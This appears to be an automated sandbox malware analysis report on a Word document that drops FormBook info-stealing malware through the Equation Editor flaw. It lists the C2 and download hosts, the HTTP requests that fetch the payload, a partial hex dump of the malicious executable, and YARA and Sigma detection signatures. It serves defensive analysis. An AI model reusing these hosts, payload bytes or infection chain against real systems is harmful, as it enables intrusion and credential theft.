Loading ...

Play interactive tourEdit tour

Windows Analysis Report PO4018308875.doc

Overview

General Information

Sample Name:PO4018308875.doc
Analysis ID:452509
MD5:1e7bc879d7960afaa08148c635ae534f
SHA1:e1a0db056bdc1cba07ef43c27a80e5bfd79b4eac
SHA256:8c4b07ce49252a4ed12ad611a9f8fde65a63fc12368c6726776e86e140d3872e
Tags:doc
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2716 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 1328 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • princedan859323.exe (PID: 3036 cmdline: C:\Users\user\AppData\Roaming\princedan859323.exe MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • princedan859323.exe (PID: 2516 cmdline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • princedan859323.exe (PID: 2740 cmdline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • princedan859323.exe (PID: 2736 cmdline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • princedan859323.exe (PID: 2604 cmdline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • princedan859323.exe (PID: 2676 cmdline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • princedan859323.exe (PID: 3016 cmdline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • princedan859323.exe (PID: 3000 cmdline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • princedan859323.exe (PID: 2972 cmdline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • princedan859323.exe (PID: 2948 cmdline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
      • princedan859323.exe (PID: 2964 cmdline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.containerflippers.com/np0c/"], "decoy": ["spartansurebets.com", "threelakestradingco.com", "metaspace.global", "zjenbao.com", "directlyincluded.press", "peterchadri.com", "learnhousebreaking.com", "wonobattle.online", "leadate.com", "shebafarmscali.com", "top4thejob.online", "awakeyourfaith.com", "bedford-st.com", "lolwhats.com", "cucurumbel.com", "lokalbazaar.com", "matter.pro", "eastcountyanimalrescue.com", "musesgirl.com", "noordinarydairy.com", "saigonstar2.com", "farmacias-aranda.com", "fjzzck.com", "createandelevate.solutions", "australiavapeoil.com", "imperfectlymassabella.com", "criminalmindeddesign.com", "silverstoneca.com", "scotlandpropertygroup.com", "3dvbuild.com", "privatebeautysuites.com", "driplockerstore.com", "rcdesigncompany.com", "2141cascaderdsw.com", "mybbblog.com", "bodyambrosia.com", "solitudeblog.com", "coworkingofficespaces.com", "9999cpa.com", "flipwo.com", "dynamicfitnesslife.store", "anandsharmah.com", "afyz-jf7y.net", "erikagrandstaff.com", "pumpfoil.com", "bodurm.com", "goldlifetime.com", "a1organ.com", "akomandr.com", "hsavvysupply.com", "dyvyn.com", "bizlikeabosslady.network", "livein.space", "helpafounderout.com", "orbmena.com", "mrrodgersrealty.com", "roxhomeswellington.com", "klimareporter.com", "1040fourthst405.com", "blackbuiltbusinesses.com", "solidswim.com", "lordetkinlik3.com", "gardencontainerbar.com", "viperporn.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x2b748:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x2b9c2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x374e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x36fd1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x375e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x3775f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x2c3da:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x3624c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x2d0d3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x3d187:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x3e18a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x3a269:$sqlite3step: 68 34 1C 7B E1
    • 0x3a37c:$sqlite3step: 68 34 1C 7B E1
    • 0x3a298:$sqlite3text: 68 38 2A 90 C5
    • 0x3a3bd:$sqlite3text: 68 38 2A 90 C5
    • 0x3a2ab:$sqlite3blob: 68 53 D8 7F 8C
    • 0x3a3d3:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x11768:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x119e2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x1d505:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x1cff1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x1d607:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1d77f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x123fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1c26c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x130f3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x231a7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x241aa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 4 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.princedan859323.exe.340af10.5.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.princedan859323.exe.340af10.5.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9cf58:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9d1d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0xa8cf5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0xa87e1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0xa8df7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0xa8f6f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x9dbea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0xa7a5c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9e8e3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0xae997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0xaf99a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.princedan859323.exe.340af10.5.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0xaba79:$sqlite3step: 68 34 1C 7B E1
        • 0xabb8c:$sqlite3step: 68 34 1C 7B E1
        • 0xabaa8:$sqlite3text: 68 38 2A 90 C5
        • 0xabbcd:$sqlite3text: 68 38 2A 90 C5
        • 0xababb:$sqlite3blob: 68 53 D8 7F 8C
        • 0xabbe3:$sqlite3blob: 68 53 D8 7F 8C
        4.2.princedan859323.exe.33994f0.4.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.princedan859323.exe.33994f0.4.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x10e978:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x10ebf2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x11a715:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x11a201:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x11a817:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x11a98f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x10f60a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x11947c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x110303:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1203b7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1213ba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.239.243.112, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1328, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1328, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\princedan859323.exe, CommandLine: C:\Users\user\AppData\Roaming\princedan859323.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\princedan859323.exe, NewProcessName: C:\Users\user\AppData\Roaming\princedan859323.exe, OriginalFileName: C:\Users\user\AppData\Roaming\princedan859323.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1328, ProcessCommandLine: C:\Users\user\AppData\Roaming\princedan859323.exe, ProcessId: 3036

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://topv.xyz/princedanx.exeAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.containerflippers.com/np0c/"], "decoy": ["spartansurebets.com", "threelakestradingco.com", "metaspace.global", "zjenbao.com", "directlyincluded.press", "peterchadri.com", "learnhousebreaking.com", "wonobattle.online", "leadate.com", "shebafarmscali.com", "top4thejob.online", "awakeyourfaith.com", "bedford-st.com", "lolwhats.com", "cucurumbel.com", "lokalbazaar.com", "matter.pro", "eastcountyanimalrescue.com", "musesgirl.com", "noordinarydairy.com", "saigonstar2.com", "farmacias-aranda.com", "fjzzck.com", "createandelevate.solutions", "australiavapeoil.com", "imperfectlymassabella.com", "criminalmindeddesign.com", "silverstoneca.com", "scotlandpropertygroup.com", "3dvbuild.com", "privatebeautysuites.com", "driplockerstore.com", "rcdesigncompany.com", "2141cascaderdsw.com", "mybbblog.com", "bodyambrosia.com", "solitudeblog.com", "coworkingofficespaces.com", "9999cpa.com", "flipwo.com", "dynamicfitnesslife.store", "anandsharmah.com", "afyz-jf7y.net", "erikagrandstaff.com", "pumpfoil.com", "bodurm.com", "goldlifetime.com", "a1organ.com", "akomandr.com", "hsavvysupply.com", "dyvyn.com", "bizlikeabosslady.network", "livein.space", "helpafounderout.com", "orbmena.com", "mrrodgersrealty.com", "roxhomeswellington.com", "klimareporter.com", "1040fourthst405.com", "blackbuiltbusinesses.com", "solidswim.com", "lordetkinlik3.com", "gardencontainerbar.com", "viperporn.net"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exeReversingLabs: Detection: 23%
          Source: C:\Users\user\AppData\Local\Temp\princedan859323.exeReversingLabs: Detection: 23%
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeReversingLabs: Detection: 23%
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO4018308875.docReversingLabs: Detection: 41%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORY

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\princedan859323.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\princedan859323.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: global trafficDNS query: name: topv.xyz
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.containerflippers.com/np0c/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEDNS query: topv.xyz
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEDNS query: topv.xyz
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 22 Jul 2021 12:14:41 GMTContent-Type: application/x-msdownloadContent-Length: 648912Last-Modified: Wed, 21 Jul 2021 23:31:35 GMTConnection: keep-aliveETag: "60f8ae57-9e6d0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0f 9e f8 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 9c 08 00 00 2c 01 00 00 00 00 00 96 bb 08 00 00 20 00 00 00 c0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c bb 08 00 57 00 00 00 00 c0 08 00 18 28 01 00 00 00 00 00 00 00 00 00 00 ca 09 00 d0 1c 00 00 00 00 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c 9b 08 00 00 20 00 00 00 9c 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 28 01 00 00 c0 08 00 00 2a 01 00 00 9e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0a 00 00 02 00 00 00 c8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 bb 08 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 9f 08 00 a0 1b 00 00 03 00 00 00 20 00 00 06 98 31 00 00 04 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 18 18 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 14 00 00 0a 74 02 00 00 02 1a 2d 03 26 2b 07 80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 09 00 25 00 00 00 00 00 00 00 02 28 15 00 00 0a 02 03 16 2c 0b 26 26 02 04 15 2d 0b 26 26 2b 0e 7d 02 00 00 04 2b f0 7d 03 00 00 04 2b 00 2a 00 00 00 03 30 04 00 5c 00 00 00 00 00 00 00 02 28 15 00 00 0a 20 f0 55 00 00 1c 2d 1b 26 02 73 16 00 00 0a 1d 2d 18 26 26 28 17 00 00 0a 7e 06 00 00 04 25 2d 2f 2b 0e 28 18 00 00 0a 2b df 7d 04 00 00 04 2b e3 26 7e 05 00 00 04 fe 06 0d 00 00 06 73 19 00 00 0a 25 1c 2d 03 26 2b 07 80 06 00 00 04 2b 00 6f 1a 00 00 0a 2a 13 30 03 00 29 00 00 00 01 00 00 11 03 04 73 04 00 00 06 16 2c 0c 26 02 03 28 0a 00 00 06 2d 13 2b 03 0a 2b f2 02 7b 04 00 00 04 06 6f 1b 00 00 0a 17 2a 16 2a 00 00 00 13 30 03 00 24 00 00 00 01 00 00 11 02 03 28 0a 00 00 06 17 2d 06 26 06 2c 14
          Source: Joe Sandbox ViewIP Address: 185.239.243.112 185.239.243.112
          Source: Joe Sandbox ViewASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
          Source: global trafficHTTP traffic detected: GET /princedanx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: topv.xyzConnection: Keep-Alive
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B09F78D-537D-406E-B057-1B1541B1D39D}.tmpJump to behavior
          Source: global trafficHTTP traffic detected: GET /princedanx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: topv.xyzConnection: Keep-Alive
          Source: unknownDNS traffic detected: queries for: topv.xyz
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmpString found in binary or memory: http://go.microso
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drString found in binary or memory: http://ocsp.digicert.com0H
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drString found in binary or memory: http://ocsp.digicert.com0I
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drString found in binary or memory: http://ocsp.digicert.com0O
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drString found in binary or memory: http://www.digicert.com/CPS0
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drString found in binary or memory: http://www.opera.com0
          Source: princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.drString found in binary or memory: https://www.digicert.com/CPS0

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\princedan859323.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\princedan859323.exeCode function: 4_2_002EA290
